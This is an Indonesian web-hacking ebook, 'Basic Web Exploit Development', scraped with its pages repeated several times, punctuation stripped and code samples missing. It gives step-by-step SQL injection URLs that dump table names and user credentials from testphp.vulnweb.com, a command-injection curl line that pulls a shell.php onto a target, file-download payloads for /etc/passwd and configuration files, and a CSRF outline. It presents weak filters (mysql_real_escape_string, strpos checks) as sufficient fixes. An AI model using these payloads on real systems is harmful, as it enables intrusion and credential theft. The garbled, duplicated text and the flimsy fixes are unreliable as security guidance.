httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 11: Basic Web Exploit Development

0x03 - SQL Injection

Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini

Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah

Mengapa bisa berubah

Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo

Query SQL diatas akan berubah menjadi

Maka akan menyebabkan error atau vulnerability pada query SQL

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 12: Basic Web Exploit Development

0x03 - SQL Injection

Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +

http127001postphpid=[Query]

Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=

Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--

Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp

Perintah diatas menggunakan cURL untuk download file dari server lain

Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd

Dan masih banyak lagi

0x04 - Remote Code Execution

Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php

Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig

0x05 - Local File Download

Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target

0x05 - Local File Download

Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file

Contoh kode

Kode diatas akan mendownload file yang di input dari parameter file

Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini

Kode diatas akan mendownload file yang di input dari parameter downloadfile

0x05 - Local File Download

Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download

http127001filephpdownload=[File]

Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web

http127001filephpdownload=configurationphp

Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa

Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server

http127001filephpdownload=etcpasswd

0x05 - Local File Download

Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php

Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file

0x06 - Cross Site Request Forgery

Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web

0x06 - Cross Site Request Forgery

Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode

Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini

Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session

0x06 - Cross Site Request Forgery

Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target

Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi

Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name

Berikut isi kode dari httpgooglecomadministratorpostphp

Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name

Berikut contoh kode

Kode tersebut akan menjadi seperti ini

Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut

0x06 - Cross Site Request Forgery

Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php

Contoh kode

Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal

0x07 - Mengarsipkan Exploit

Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security

Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC

0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim

Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit

Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas

0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom

0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom

Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya

Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini

Terima kasih kepada

Page 13: Basic Web Exploit Development

0x03 - SQL Injection

Injeksi SQL Injection

Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()

Maka akan muncul tables yang ada

Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users

0x03 - SQL Injection

Injeksi SQL Injection

Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)

Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115

httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--

Maka akan muncul column yang ada

Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name

0x03 - SQL Injection

Injeksi SQL Injection

Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--

Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--

Maka akan muncul data pada column tersebut

Data Column Uname testPass test

0x03 - SQL Injection

Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi

Menambahkan fungsi mysql_real_escape_string pada parameter id

Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query

0x04 - Remote Code Execution

Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut

0x04 - Remote Code Execution

Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini

Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd

Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah

Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi

0x04 - Remote Code Execution

Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini

http127001cmdphpcmd=[Perintah]

Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux

